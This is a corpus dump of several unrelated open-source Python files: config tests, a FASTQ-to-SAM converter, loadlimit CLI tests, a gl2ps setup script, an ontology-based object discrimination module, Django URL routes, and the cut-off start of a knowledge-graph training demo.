'TEXT': {'transcoder': my_callback},
}
CFG_BAD = {
'MARK': {'transcoder': 42}
}
class TestConf:
def test_default_config(self):
for fmt, expected in (
(transcode.conf.HTML_FORMAT, transcode.render.render_html),
(transcode.conf.SIMPLE_TEXT_FORMAT, transcode.render.render_simple),
(transcode.conf.MARKDOWN_FORMAT, transcode.render.render_markdown),
(transcode.conf.RST_FORMAT, transcode.render.render_restructuredtext),
):
handler, args, kwargs = transcode.conf.get_transcoder(fmt)
assert handler is expected
def test_config_with_actual_callback(self):
handler, args, kwargs = transcode.conf.get_transcoder('TEXT', CFG_GOOD)
assert handler == my_callback
assert args == ()
assert kwargs == {}
def test_config_with_bad_callback(self):
        # load_config must reject a transcoder entry that is not callable
        with pytest.raises(TypeError):
            transcode.conf.load_config(CFG_BAD)
| mit | -1,325,778,167,555,772,200 | 25.813953 | 82 | 0.619254 | false | 3.792763 | false | false | false |
Cibiv/Teaser | tools/fastq2sam.py | 1 | 5577 | #!/usr/bin/env python
"""
Convert FASTQ output of simulators containing simulation information into SAM alignment file
"""
import traceback
import base64
def encode_qname(qname, retain_petag=True):
# return md5.new(str(qname)).hexdigest()
if qname[-2] == "/":
if retain_petag:
return base64.b64encode(qname[0:-2], "-_") + qname[-2:]
else:
return base64.b64encode(qname[0:-2], "-_")
else:
return base64.b64encode(qname, "-_")
class Object:
def __init__(self):
pass
class FASTQ:
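    # Minimal FASTQ reader: consumes 4-line records and mirrors each read,
    # with a base64-encoded name, into an "enc_" copy of the input file.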
def __init__(self, filename, pe):
self.handle = open(filename, "r")
self.out_handle = open("enc_" + filename, "w")
self.lines = iter(self.handle.readlines())
self.is_paired = pe
def readline(self):
return next(self.lines).strip()
def next_read(self):
read = Object()
read.valid = False
try:
read.id = self.readline()
if len(read.id) > 0 and read.id[0] == "@":
read.id = read.id[1:]
            else:
                # jump to the handler below, which marks the read invalid
                raise ValueError("malformed FASTQ header: %r" % read.id)
read.id_encoded = encode_qname(read.id, self.is_paired)
read.seq = self.readline()
read.desc = self.readline()
read.qual = self.readline()
read.valid = True
self.out_handle.write("@" + read.id_encoded + "\n")
self.out_handle.write("%s\n%s\n%s\n" % (read.seq, read.desc, read.qual))
except Exception as e:
pass
return read
"""
Aligns reads based on their data
"""
class Aligner:
def __init__(self):
pass
    def align(self, read):
        pass
class DummyAligner(Aligner):
def align(self, read, paired=False, is_read1=True):
read.chrom = "A"
read.pos = 0
if paired:
read.is_read1 = is_read1
read.is_read2 = not is_read1
else:
read.is_read1 = False
read.is_read2 = False
read.flags = 0
if paired:
read.flags = read.flags | 0x1
if read.is_read1:
read.flags = read.flags | 0x40
if read.is_read2:
read.flags = read.flags | 0x80
def align_pair(self, read1, read2):
self.align(read1, True, True)
self.align(read2, True, False)
class dwgsim(Aligner):
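    # dwgsim encodes the simulated origin of every read in its name
    # (chromosome, both mate positions, strand, ...), so "aligning" is
    # just parsing those fields back out of the identifier.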
def align(self, read, paired=False, is_read1=True):
# @random_sequence_632951_1_1_0_0_0_2:0:0_0:0:0_0
parts = read.id.split("_")
if is_read1:
read.pos = parts[-9]
else:
read.pos = parts[-8]
if paired:
read.is_read1 = is_read1
read.is_read2 = not is_read1
else:
read.is_read1 = False
read.is_read2 = False
read.chrom = "_".join(parts[0:-9])
# print(read.id,read.chrom,read.pos)
read.flags = 0
reverse = (int(parts[-7]) == 1)
if read.is_read2:
reverse = not reverse
if reverse:
read.flags = read.flags | 0x10
if paired:
read.flags = read.flags | 0x1
if read.is_read1:
read.flags = read.flags | 0x40
if read.is_read2:
read.flags = read.flags | 0x80
def align_pair(self, read1, read2):
self.align(read1, True, True)
self.align(read2, True, False)
class Converter:
def __init__(self, aligner, outfile):
self.aligner = aligner
self.sam = open(outfile, "w")
self.sam_enc = open("enc_" + outfile, "w")
def write(self, what):
self.sam.write(what)
self.sam_enc.write(what)
def write_sam_header(self, reads):
seq = []
for read in reads:
if not read.chrom in seq:
seq.append(read.chrom)
for s in sorted(seq):
self.write("@SQ\tSN:%s\tLN:10000\n" % s)
self.write("@PG\tID:mapper\tPN:mapper\tVN:1.0\n")
def write_single(self, read, to):
read_id = read.id
if read_id[-2] == "/":
read_id = read_id[0:-2]
to.write("%s\t%d\t%s\t%d\t60\t*\t*\t0\t0\t%s\t%s\n" % (
read_id, read.flags, read.chrom, int(read.pos), read.seq, read.qual))
def align_se(self, infile):
fastq = FASTQ(infile, False)
read = fastq.next_read()
# aligned = []
while read.valid:
self.aligner.align(read)
# aligned.append(read)
self.write_single(read, self.sam)
read.id = read.id_encoded
self.write_single(read, self.sam_enc)
del read
read = fastq.next_read()
# self.write_sam_header(aligned)
# for read in aligned:
# self.write_single(read,self.sam)
# read.id = read.id_encoded
# self.write_single(read,self.sam_enc)
self.sam.close()
self.sam_enc.close()
def align_pe(self, infile_1, infile_2):
fq1 = FASTQ(infile_1, True)
fq2 = FASTQ(infile_2, True)
read1 = fq1.next_read()
read2 = fq2.next_read()
aligned1 = []
aligned2 = []
while read1.valid and read2.valid:
self.aligner.align_pair(read1, read2)
aligned1.append(read1)
aligned2.append(read2)
read1 = fq1.next_read()
read2 = fq2.next_read()
self.write_sam_header(aligned1)
for i in range(len(aligned1)):
self.write_single(aligned1[i], self.sam)
self.write_single(aligned2[i], self.sam)
aligned1[i].id = aligned1[i].id_encoded
aligned2[i].id = aligned2[i].id_encoded
self.write_single(aligned1[i], self.sam_enc)
self.write_single(aligned2[i], self.sam_enc)
self.sam.close()
self.sam_enc.close()
if __name__ == "__main__":
import sys
if len(sys.argv) < 3:
print("Usage: fastq2sam.py <simulator> <reads.fastq> [<reads_2.fastq>]")
raise SystemExit
arg_sim = sys.argv[1]
arg_reads1 = sys.argv[2]
if len(sys.argv) > 3:
arg_reads2 = sys.argv[3]
paired = True
else:
paired = False
if arg_sim == "dwgsim":
aligner = dwgsim()
else:
raise "Simulator not supported"
conv = Converter(aligner, arg_reads1 + ".sam")
if not paired:
print(
"Align single-end reads from " + arg_sim + ", input: " + arg_reads1 + ", output " + arg_reads1 + ".sam...")
conv.align_se(arg_reads1)
else:
print(
"Align paired-end reads from " + arg_sim + ", input: " + arg_reads1 + " + " + arg_reads2 + ", output " + arg_reads1 + ".sam...")
conv.align_pe(arg_reads1, arg_reads2)
| mit | -5,396,683,009,936,029,000 | 21.130952 | 131 | 0.636902 | false | 2.524672 | false | false | false |
arielmakestuff/loadlimit | test/unit/cli/test_main.py | 1 | 9995 | # -*- coding: utf-8 -*-
# test/unit/cli/test_main.py
# Copyright (C) 2016 authors and contributors (see AUTHORS file)
#
# This module is released under the MIT License.
"""Test main()"""
# ============================================================================
# Imports
# ============================================================================
# Stdlib imports
import os
from pathlib import Path
import sys
# Third-party imports
from pandas import Timedelta
import pytest
from pytz import timezone
# Local imports
import loadlimit.cli as cli
from loadlimit.cli import main, PROGNAME
from loadlimit.importhook import TaskImporter
from loadlimit.util import LogLevel
# ============================================================================
# Fixtures
# ============================================================================
@pytest.fixture
def empty_argv(monkeypatch):
"""Set sys.argv to an empty list"""
monkeypatch.setattr(sys, 'argv', [])
@pytest.fixture
def norunloop(monkeypatch):
"""Mock runloop() with func that does nothing"""
def fake_runloop(self, config, args, state):
"""fake_runloop"""
cli.process_options(config, args)
monkeypatch.setattr(cli.RunLoop, '__call__', fake_runloop)
pytestmark = pytest.mark.usefixtures('empty_argv', 'norunloop')
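# All tests below run with an empty sys.argv and a stubbed-out run loop,
# so main() only exercises argument parsing and option processing.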
# ============================================================================
# Test main
# ============================================================================
def test_main_help(capsys):
"""main"""
with pytest.raises(SystemExit) as err:
main()
assert err.value.args == (0, )
# Check stdout
out, err = capsys.readouterr()
assert out.startswith('usage: {}'.format(PROGNAME))
def test_main_nonempty_sysargv(monkeypatch, capsys):
"""Non-empty sys.argv list"""
monkeypatch.setattr(sys, 'argv', ['loadlimit', '-h'])
with pytest.raises(SystemExit) as err:
main()
assert err.value.args == (0, )
# Check stdout
out, err = capsys.readouterr()
assert out.startswith('usage: {}'.format(PROGNAME))
def test_main_loadlimit_configsection(capsys):
"""loadlimit config section exists in dict passed to main"""
config = dict(loadlimit={})
with pytest.raises(SystemExit) as err:
main(config=config)
assert err.value.args == (0, )
# Check stdout
out, err = capsys.readouterr()
assert out.startswith('usage: {}'.format(PROGNAME))
def test_main_default_args():
"""Config default values"""
config = {}
args = ['-d', '1s', 'what']
with pytest.raises(SystemExit):
main(arglist=args, config=config)
assert config
assert len(config) == 1
assert 'loadlimit' in config
llconfig = config['loadlimit']
names = ['timezone', 'numusers', 'duration', 'importer',
'show-progressbar', 'cache', 'export', 'periods', 'logging',
'qmaxsize', 'flushwait', 'initrate', 'schedsize', 'sched_delay']
assert len(llconfig) == len(names)
for name in names:
assert name in llconfig
assert llconfig['numusers'] == 1
assert llconfig['timezone'] == timezone('UTC')
assert llconfig['duration'] == Timedelta('1s')
assert llconfig['show-progressbar'] is True
assert llconfig['cache']['type'] == 'memory'
assert llconfig['export']['type'] is None
assert 'targetdir' not in llconfig['export']
assert isinstance(llconfig['importer'], TaskImporter)
assert llconfig['periods'] == 8
assert llconfig['logging']['loglevel'] == LogLevel.WARNING
assert llconfig['qmaxsize'] == 1000
assert llconfig['flushwait'] == Timedelta('2s')
assert llconfig['initrate'] == 0
assert llconfig['schedsize'] == 0
assert llconfig['sched_delay'] == Timedelta('0s')
@pytest.mark.parametrize('val', ['fhjdsf', '42z', 'one zots'])
def test_main_bad_duration(val):
"""Invalid value for duration option raises an error"""
config = {}
args = ['-d', val, 'what']
with pytest.raises(ValueError):
main(arglist=args, config=config)
@pytest.mark.parametrize('val', [None, ''])
def test_main_empty_duration(val):
"""Not giving a duration raises an error"""
config = {}
args = ['what']
if val is not None:
args[:0] = ['-d', val]
expected = 'duration option got invalid value {!r}'.format(val)
with pytest.raises(ValueError) as err:
main(arglist=args, config=config)
assert err.value.args == (expected, )
def test_main_bad_users():
"""Value < 0 for users option raises error"""
config = {}
args = ['-u', '0', 'what']
expected = 'users option expected value > 0, got 0'
with pytest.raises(ValueError) as err:
main(arglist=args, config=config)
assert err.value.args == (expected, )
@pytest.mark.parametrize('val', [0, 1])
def test_main_periods_badvalue(val):
"""Raise error if periods is given value <= 1"""
config = {}
args = ['-p', str(val), '-d', '1s', 'what']
expected = 'periods option must be > 1'
with pytest.raises(ValueError) as err:
main(arglist=args, config=config)
assert err.value.args == (expected, )
def test_main_export_baddir(monkeypatch):
"""Raise error if directory does not exist"""
def fake_isdir(n):
"""fake_isdir"""
return False
monkeypatch.setattr(cli, 'isdir', fake_isdir)
config = {}
args = ['-E', 'csv', '-e', '/not/exist', '-d', '1s', 'what']
expected = '/not/exist'
with pytest.raises(FileNotFoundError) as err:
main(arglist=args, config=config)
assert err.value.args == (expected, )
def test_main_export_targetdir(monkeypatch):
"""Store export directory in internal config"""
def fake_isdir(n):
"""fake_isdir"""
return True
monkeypatch.setattr(cli, 'isdir', fake_isdir)
config = {}
args = ['-E', 'csv', '-e', '/not/exist', '-d', '1s', 'what']
with pytest.raises(SystemExit):
main(arglist=args, config=config)
llconfig = config['loadlimit']
assert 'export' in llconfig
exportconfig = llconfig['export']
assert exportconfig['type'] == 'csv'
assert exportconfig['targetdir'] == '/not/exist'
def test_main_export_nodir(monkeypatch):
"""Use current directory if targetdir not given"""
config = {}
args = ['-E', 'csv', '-d', '1s', 'what']
with pytest.raises(SystemExit):
main(arglist=args, config=config)
llconfig = config['loadlimit']
assert 'export' in llconfig
exportconfig = llconfig['export']
assert exportconfig['type'] == 'csv'
assert exportconfig['targetdir'] == os.getcwd()
def test_main_logfile_default():
"""Default logfile"""
config = {}
args = ['-L', '-d', '1s', 'what']
with pytest.raises(SystemExit):
main(arglist=args, config=config)
llconfig = config['loadlimit']
assert 'logging' in llconfig
expected = Path.cwd() / '{}.log'.format(cli.PROGNAME)
assert llconfig['logging']['logfile'] == str(expected)
def test_main_logfile_bad_parentdir(monkeypatch):
"""Raise error if given logfile path's parent doesn't exist"""
filename = Path('/imaginary/path/notexist')
def fake_isdir(self):
"""fake_isdir"""
return False
monkeypatch.setattr(cli.Path, 'is_dir', fake_isdir)
config = {}
args = ['-L', '-l', str(filename), '-d', '1s', 'what']
with pytest.raises(FileNotFoundError) as err:
main(arglist=args, config=config)
assert err.value.args == (str(filename.parent), )
def test_main_logfile_isdir(monkeypatch):
"""Raise error if given logfile is a directory"""
filename = Path('/imaginary/path/notexist')
def fake_isdir(self):
"""fake_isdir"""
return True
monkeypatch.setattr(cli.Path, 'is_dir', fake_isdir)
config = {}
args = ['-L', '-l', str(filename), '-d', '1s', 'what']
with pytest.raises(IsADirectoryError) as err:
main(arglist=args, config=config)
assert err.value.args == (str(filename), )
@pytest.mark.parametrize('val', ['hello', (42, )])
def test_main_flushwait_badval(val):
"""Raise error if flushwait is given bad value"""
config = {}
args = ['--flush-wait', str(val), '-d', '1s', 'what']
expected = 'duration option got invalid value: {}'.format(val)
with pytest.raises(ValueError) as err:
main(arglist=args, config=config)
assert err.value.args == (expected, )
def test_main_schedsize_badval():
"""Raise error if sched-size is given value larger than numusers"""
numusers = 10
schedsize = 42
config = {}
args = ['-u', str(numusers), '--sched-size', str(schedsize), '-d', '1s',
'what']
msg = 'sched-size option expected maximum value of {}, got value {}'
expected = msg.format(numusers, schedsize)
with pytest.raises(ValueError) as err:
main(arglist=args, config=config)
assert err.value.args == (expected, )
@pytest.mark.parametrize('val,numusers', [
    (v, u) for v in [0, 5, 10]
    for u in [5, 10]
    if v <= u
])
def test_main_schedsize_goodval(val, numusers):
    """Don't raise error if sched-size is >= 0 and <= numusers"""
    # use the parametrized values rather than shadowing them with constants
    config = {}
    args = ['-u', str(numusers), '--sched-size', str(val), '-d', '1s',
            'what']
    with pytest.raises(SystemExit):
        main(arglist=args, config=config)
@pytest.mark.parametrize('val', ['hello', (42, )])
def test_main_sched_delay_badval(val):
"""Raise error if sched_delay is given bad value"""
config = {}
args = ['--sched-delay', str(val), '-d', '1s', 'what']
expected = 'sched-delay option got invalid value: {}'.format(val)
with pytest.raises(ValueError) as err:
main(arglist=args, config=config)
assert err.value.args == (expected, )
# ============================================================================
#
# ============================================================================
| mit | 2,256,627,370,758,611,500 | 27.075843 | 78 | 0.587394 | false | 3.761761 | true | false | false |
dladd/pyFormex | pyformex/extra/pygl2ps/setup.py | 1 | 1773 | # $Id$
##
## This file is part of pyFormex 0.8.9 (Fri Nov 9 10:49:51 CET 2012)
## pyFormex is a tool for generating, manipulating and transforming 3D
## geometrical models by sequences of mathematical operations.
## Home page: http://pyformex.org
## Project page: http://savannah.nongnu.org/projects/pyformex/
## Copyright 2004-2012 (C) Benedict Verhegghe ([email protected])
## Distributed under the GNU General Public License version 3 or later.
##
##
## This program is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program. If not, see http://www.gnu.org/licenses/.
##
from distutils.core import setup, Extension
setup(name="pygl2ps",
version="1.3.3",
description="Wrapper for GL2PS, an OpenGL to PostScript Printing Library",
author="Benedict Verhegghe",
author_email="[email protected]",
url="http://pyformex.org",
long_description="""
Python wrapper for GL2PS library by Christophe Geuzaine.
See http://www.geuz.org/gl2ps/
""",
license="GNU LGPL (Library General Public License)",
py_modules=["gl2ps"],
ext_modules=[Extension("_gl2ps",
["gl2ps.c","gl2ps_wrap.c"],
libraries=["GL"])])
| gpl-3.0 | 2,702,310,009,199,735,000 | 42.243902 | 80 | 0.689227 | false | 3.490157 | false | false | false |
severin-lemaignan/dialogs | src/dialogs/interpretation/discrimination.py | 1 | 16975 | # -*- coding: utf-8 -*-
"""This module implements the clarification process for ambiguous descriptions.
Given a description of an object (ambigouos or not) it returns, if found, the
object's identifier in oro. If necessary, it will query the human for additional
information.
"""
import logging
logger = logging.getLogger("dialogs")
from kb import KbError
from dialogs.resources_manager import ResourcePool
from dialogs.dialog_exceptions import UnsufficientInputError
from dialogs.sentence import *
from dialogs.sentence_factory import SentenceFactory
from dialogs.helpers.helpers import generate_id
from random import choice
class Discrimination(object):
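    # Narrows an ambiguous object description down to a single ontology
    # concept, generating clarification questions for the human when
    # several candidates remain.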
def __init__(self):
self.oro = ResourcePool().ontology_server
# -- GET_ALL_OBJECTS_WITH_DESC ------------------------------------------------#
# Returns all objects' ids with a given set of features (eg. green, big, etc).
# Since we have several descriptions, we obtain a list of objects for each agent
# and then we intersect them.
#
# INPUT:
# - description:
# [[agent1 '?obj' oro_query]..[[agentN '?obj' oro_query]]
# (oro_query= ['?obj hasColor blue',.. ?obj hasShape box'])
#
# OUTPUT:
# - empty list: no objects found fulfilling the description
# - list: objects fulfilling the description
# - None: no description (or description format incorrect)
# -----------------------------------------------------------------------------#
def get_all_objects_with_desc(self, description):
obj_list = None
for agent_desc in description:
obj_tmp = []
try:
obj_tmp = self.oro.findForAgent(ResourcePool().get_model_mapping(agent_desc[0]), agent_desc[1], agent_desc[2])
except KbError: #The agent does not exist in the ontology
pass
# if no object found, no need to continue
if not obj_tmp:
obj_list = []
break
else:
if obj_list is None:
obj_list = obj_tmp
else:
obj_list = [x for x in obj_tmp if x in obj_list] # intersection
return obj_list
# -- GET_DISCRIMINANT ---------------------------------------------------------#
# Queries the ontology for a list of discriminants. Returns the first one.
# TODO: prioritize which discriminant to return.
#
# INPUT:
# - agent
# - object list
# - ignore_descriptors: list of descriptors not to be used
# - include_partial: if true, then partial discriminants are also returned
# OUTPUT:
# - discriminant: [C, discriminat] if complete, or [P, discriminant] if partial
# The new discriminant should be different from the ones already known or ignored
# -----------------------------------------------------------------------------#
def get_discriminant(self, agent, obj_list, ignore_descriptors, include_partial):
discriminants = self.oro.discriminateForAgent(ResourcePool().get_model_mapping(agent), obj_list)
logger.debug(colored_print('Possible discriminants: ', 'magenta') + \
str(colored_print(discriminants[1], 'blue')) + \
colored_print(" (complete discriminants: ", 'magenta') + \
str(colored_print(discriminants[0], 'blue')) + ")")
complete_disc = discriminants[0]
partial_disc = discriminants[1]
if complete_disc:
res = [x for x in complete_disc if x not in ignore_descriptors]
elif partial_disc and include_partial:
res = [x for x in partial_disc if x not in ignore_descriptors]
else:
res = None
if res:
# include randomization so the same discriminant is not always returned
return choice(res)
else:
# No discriminant after applying the blacklist.
return None
# -- GET_DESCRIPTOR -----------------------------------------------------------#
# Searches for a new descriptor candidate from all agents.
#
# INPUT:
# - description:
# [[agent1 '?obj' oro_query]..[[agentN '?obj' oro_query]]
# (oro_query= ['?obj hasColor blue',.. ?obj hasShape box'])
# - ignore_features: list of features not to use as discriminants
# [feat1 ..featN]
# - allowPartialDesc: consider also partial discriminants (1) or not (0) (0 default)
#
# OUTPUT:
# - descriptor or None (if no discriminant for any agent found)
# -----------------------------------------------------------------------------#
def get_descriptor(self, description, ignore_features=None, partial_disc=True):
if not ignore_features: ignore_features = []
objL = self.get_all_objects_with_desc(description)
descriptor = None
agent = None
        #TODO bug in oro doesn't allow searching for discriminants based on other agents' models!!
        # we cannot search in all agents, but only in the robot's model
# for agent_desc in description:
# # list current descriptors to not to use them anymore
# #currentDescriptors = map(lambda x: x.split()[1], agent_desc[2])
# descriptor = self.get_discriminant(agent_desc[0], objL, ignore_features, partial_disc)
#
# if descriptor:
# agent = agent_desc[0]
# break
agent = ResourcePool().default_model
# list current descriptors to not to use them anymore
#currentDescriptors = map(lambda x: x.split()[1], description[0][2])
descriptor = self.get_discriminant(agent, objL, ignore_features, partial_disc)
return agent, descriptor
# -- get_values_for_descriptor ------------------------------------------------#
# Creates the information to be sent to user based on the discriminant found.
#
# INPUT:
# - agent, discriminant, objectsList
#
# OUTPUT
# - list of values to ask for
# -----------------------------------------------------------------------------#
def get_values_for_descriptor(self, agent, descriptor, objL):
valL = []
# get values for each object
for obj in objL:
# if the discriminant is type, then look for the directClass of the obj (first found)
# how should this work for different agents? There is no directClassForAgent
# probably won't be necessary since all the knowledge of the human is part
# of the robot's knowledge as well. Then we can obtain this information
# directly from the robot itself.
if descriptor == 'rdf:type':
val = list(self.oro.getDirectClassesOf(obj).keys())
else:
val = self.oro.findForAgent(ResourcePool().get_model_mapping(agent), '?val', [obj + ' ' + descriptor + ' ?val'])
if val:
#TODO: we only consider the first result item!
valL.append(self.oro.getLabel(val[0]))
# otherwise, the object doesn't have this descriptor, and we don't include it
# we make a set to remove repeated elements
return list(set(valL))
# -- get_type_description ------------------------------------------------------#
# Returns the first type of concept in the description.
#
# INPUT:
# - description
#
# OUTPUT:
# - type
# - none
# -------------------------------------------------------------------------------#
def get_type_description(self, description):
def find(value, seq):
for item in seq:
items = item.split()
if value in items:
return items[2]
return None
type = None
for desc in description:
type = find('rdf:type', desc[2])
if type: break
return ResourcePool().ontology_server.getLabel(type)
# -- CLARIFY ------------------------------------------------------------------#
# Searches for a new descriptor candidate. The descriptor should be as
# discriminating as possible.
#
# INPUT:
# - description [['myself', '?obj', ['?obj rdf:type Bottle', '?obj hasColor blue']],
# ['agent1', '?obj', ['?obj isVisible True']]
# - ignoreFeatureL [feat1..featN] List of features not to use as discriminators.
#
# OUTPUT:
# - objectID: ok
# - UnsufficientInputError:
# - [FAILURE, "new info required"]: no match, new info required (forget previous description)
# - [SUCCESS, "Which value? ..."]: user should indicate value for descriptor (mantain previous description)
# - [SUCCESS, "additional info required"]: user should give additional info (mantain previous description)
# -----------------------------------------------------------------------------#
def clarify(self, description, ignoreFeatureL=None):
if not ignoreFeatureL: ignoreFeatureL = []
objL = self.get_all_objects_with_desc(description)
if len(objL) == 0:
logger.debug(colored_print('Nothing found!', "magenta"))
else:
logger.debug(
colored_print('Found these possible concepts ID: ', "magenta") + colored_print(str(objL), 'blue'))
if not self.oro: #No ontology server
return 'UNKNOWN_CONCEPT_' + generate_id(with_question_mark=False)
if not objL:
questions = SentenceFactory().create_i_dont_understand()
raise UnsufficientInputError({'status': 'FAILURE', 'question': questions})
#return "I don't understand"
else:
# Check if the speaker sees only some of the object.
# If he sees none of them, discriminate on the whole set.
# Else, discriminate only on visible objects.
agent = description[0][0]
logger.debug("Checking which of these objects are visible for " + agent)
visible_objects = self.visible_subset(agent, objL)
if visible_objects:
objL = visible_objects
logger.debug(colored_print('Only ', "magenta") +
colored_print(str(objL), 'blue') +
colored_print(" are visible by " + agent, "magenta"))
else:
logger.debug(colored_print('None are visible by ' + agent, "magenta"))
if len(objL) == 1:
return objL[0]
if len(objL) == 2 and self.oro.check(['%s owl:sameAs %s' % (objL[0], objL[1])]):
return objL[0]
agent, descriptor = self.get_descriptor(description, ignoreFeatureL)
object = self.get_type_description(description)
if descriptor:
sentence_builder = SentenceFactory()
question = None
values = self.get_values_for_descriptor(agent, descriptor, objL)
if not object: object = 'object'
if descriptor == 'hasColor' or descriptor == 'mainColorOfObject':
questions = sentence_builder.create_w_question_choice(object, 'color', values)
elif descriptor == 'hasShape':
questions = sentence_builder.create_w_question_choice(object, 'shape', values)
elif descriptor == 'hasSize':
questions = sentence_builder.create_w_question_choice(object, 'size', values)
elif descriptor == 'isOn':
questions = sentence_builder.create_w_question_location(object, 'on', values)
elif descriptor == 'isIn':
questions = sentence_builder.create_w_question_location(object, 'in', values)
elif descriptor == 'isNextTo':
questions = sentence_builder.create_w_question_location(object, 'next to', values)
elif descriptor == 'isAt':
questions = sentence_builder.create_w_question_location(object, 'at', values)
elif descriptor == 'isLocated':
questions = sentence_builder.create_w_question_location_PT(values, agent)
elif descriptor == 'rdf:type':
questions = sentence_builder.create_w_question_choice(object, 'type', values)
else:
questions = sentence_builder.create_w_question_generic_descriptor(object, descriptor, values)
raise UnsufficientInputError({'status': 'SUCCESS', 'question': questions})
#return questions
else:
questions = [Sentence(IMPERATIVE, '', [],
[VerbalGroup(['give'], [], 'present simple',
[NominalGroup([], ['information'], [['more', []]], [], [])],
[IndirectComplement([], [NominalGroup([], ['me'], [], [], [])]),
IndirectComplement(['about'], [
NominalGroup(['the'], [object], [], [], [])])],
[], [], VerbalGroup.affirmative, [])])]
raise UnsufficientInputError({'status': 'SUCCESS', 'question': questions})
#return "Give me more information about the object"
def visible_subset(self, agent, id_list):
""" Returns the list of visible objects for an agent from a list of objects.
"""
visible_objects = self.oro.findForAgent(ResourcePool().get_model_mapping(agent), "?o", [agent + " sees ?o"])
return list(set(id_list) & set(visible_objects))
# -- ADD_DESCRIPTOR -----------------------------------------------------------#
# Includes descriptor in description list.
#
# INPUT:
# - agent: to which agent the descriptor belongs to
# - description: current description
# - descriptor: feature
# - value: feature value
#
# OUTPUT:
# - new description
# -----------------------------------------------------------------------------#
def add_descriptor(self, agent, description, descriptor, value):
# return sublist index in seq containing value
def find(value, seq):
for index, item in enumerate(seq):
if value in item:
return index, item
idx, desc = find(agent, description)
desc[2].append('?obj ' + descriptor + ' ' + value)
description[idx] = desc
return description
# -- FIND_UNAMBIGUOUS_DESC ---------------------------------------#
# Searches an unambiguous description for a given object.
# If it fails, it returns the most complete description found.
#
# INPUT:
# - objectID: object to be described
#
# OUTPUT:
# - a tuple (is_unambigous, description)
# - is_unambigous is a boolean
# - description is a set of partial statements like
# "?obj rdf:type Superman" describing as well as possible
# the object.
# ----------------------------------------------------------------#
def find_unambiguous_desc(self, objectID):
description = None
# get the first class name
types = [t for t in list(self.oro.getDirectClassesOf(objectID).keys()) if t not in ["ActiveConcept"]]
# Not type asserted/inferred? then assume this object is unique.
if not types:
return True, []
type = types[0]
myself = ResourcePool().default_model
description = [[myself, '?obj', ['?obj rdf:type ' + type]]]
objL = self.get_all_objects_with_desc(description)
while len(objL) > 1:
nbCandidates = len(objL)
logger.debug('Description ' + objectID + ': ' + str(description))
logger.debug('ObjL: ' + str(objL))
agent, descriptor = self.get_descriptor(description, [], True)
if not descriptor:
break
val = self.oro.findForAgent(ResourcePool().get_model_mapping(agent), '?val', [objectID + ' ' + descriptor + ' ?val'])
if not val:
break
description = self.add_descriptor(agent, description, descriptor, val[0])
objL = self.get_all_objects_with_desc(description)
if nbCandidates == len(objL):
logger.error("While trying to find an unambiguous description" + \
" of " + objectID + ", oro answered a non-discriminant" + \
" property. Bug in oro? Halting here for now.")
break
if len(objL) == 1:
unambiguous = True
else:
unambiguous = False
return unambiguous, description[0][2]
| bsd-3-clause | 7,504,683,858,154,541,000 | 40.503667 | 129 | 0.540677 | false | 4.481257 | false | false | false |
denever/discipline_terra | stock/urls.py | 1 | 3873 | from django.conf.urls import patterns, include, url
from django.contrib.auth.decorators import login_required
from stock.views import ProductListView, WarningProductListView, DangerProductListView, SearchProductListView
from stock.views import ProductByCategoryListView
from stock.views import ProductDetailView
from stock.views import ProductCreateView
from stock.views import ProductUpdateView
from stock.views import ProductDeleteView
from stock.views import PackageListView
from stock.views import PackageDetailView
from stock.views import PackageCreateView
from stock.views import PackageUpdateView
from stock.views import PackageDeleteView
from stock.views import CategoryCreateView
from stock.views import CategoryDeleteView
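# Every view below is wrapped in login_required, so the whole stock app
# is only reachable by authenticated users.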
urlpatterns = patterns('stock.views',
url(r'^$', login_required(ProductListView.as_view()),
name='stock'),
url(r'^products/$', login_required(ProductListView.as_view()),
name='products'),
url(r'^products/search$', login_required(SearchProductListView.as_view()),
name='products-search'),
url(r'^products/category/(?P<pk>\d+)$',
login_required(ProductByCategoryListView.as_view()),
name='products-category'),
url(r'^products/warning$', login_required(WarningProductListView.as_view()),
name='products-warning'),
url(r'^products/danger$', login_required(DangerProductListView.as_view()),
name='products-danger'),
url(r'^product/(?P<pk>\d+)$',
login_required(ProductDetailView.as_view()),
name = 'product-detail'),
url(r'^product_create/$',
login_required(ProductCreateView.as_view()),
name = 'product-create'
),
url(r'^product_update/(?P<pk>\d+)$',
login_required(ProductUpdateView.as_view()),
name = 'product-edit'
),
url(r'^product_delete/(?P<pk>\d+)$',
login_required(ProductDeleteView.as_view()),
name = 'product-delete'
),
url(r'^packages/$', login_required(PackageListView.as_view()),
name='packages'),
url(r'^package/(?P<pk>\d+)$',
login_required(PackageDetailView.as_view()),
name = 'package-detail'),
url(r'^package_create/$',
login_required(PackageCreateView.as_view()),
name = 'package-create'
),
url(r'^package_update/(?P<pk>\d+)$',
login_required(PackageUpdateView.as_view()),
name = 'package-edit'
),
url(r'^package_delete/(?P<pk>\d+)$',
login_required(PackageDeleteView.as_view()),
name = 'package-delete'
),
url(r'^category_create/$',
login_required(CategoryCreateView.as_view()),
name = 'category-create'
),
url(r'^category_delete/(?P<pk>\d+)$',
login_required(CategoryDeleteView.as_view()),
name = 'category-delete'
),
)
| gpl-2.0 | -1,153,447,836,820,365,800 | 42.033333 | 109 | 0.487994 | false | 5.240866 | false | true | false |
jpmpentwater/traversing_knowledge_graphs | code/demo.py | 1 | 5856 | from optimize import *
from diagnostics import *
import configs
import argparse
from data import *
import copy
# parse command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('config')
parser.add_argument('dataset_path')
parser.add_argument('-i', '--initial_params', default=None)
parser.add_argument('-glove', '--glove_vectors', default=None)
args = parser.parse_args()
# load pre-set configuration from configs module
config = getattr(configs, args.config)
config['dataset_path'] = args.dataset_path
config['params_path'] = args.initial_params
config['glove_path'] = args.glove_vectors
# load all configs into local namespace
for var, val in config.iteritems():
exec("{0} = config['{0}']".format(var))
util.metadata(var, val) # this logs parameters to a metadata file.
def print_header(msg):
print
print msg.upper()
print '=====' * 5
print
# define training procedure
def build_trainer(train, test, max_steps, step_size, init_params=None):
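    # Wires the negative sampler, margin objective, observers and
    # controllers into an OnlineMaximizer; step size and step budget
    # differ between the single-edge and compositional phases.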
# negative triple generator for training
